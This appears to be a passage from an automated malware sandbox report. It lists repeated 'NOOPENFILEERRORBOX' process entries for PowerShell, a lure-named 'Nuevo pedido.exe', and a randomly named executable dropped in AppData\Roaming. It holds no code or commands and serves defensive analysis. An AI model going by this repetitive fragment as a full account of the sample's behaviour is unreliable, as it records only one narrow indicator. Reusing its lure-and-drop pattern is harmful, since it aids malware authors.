Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
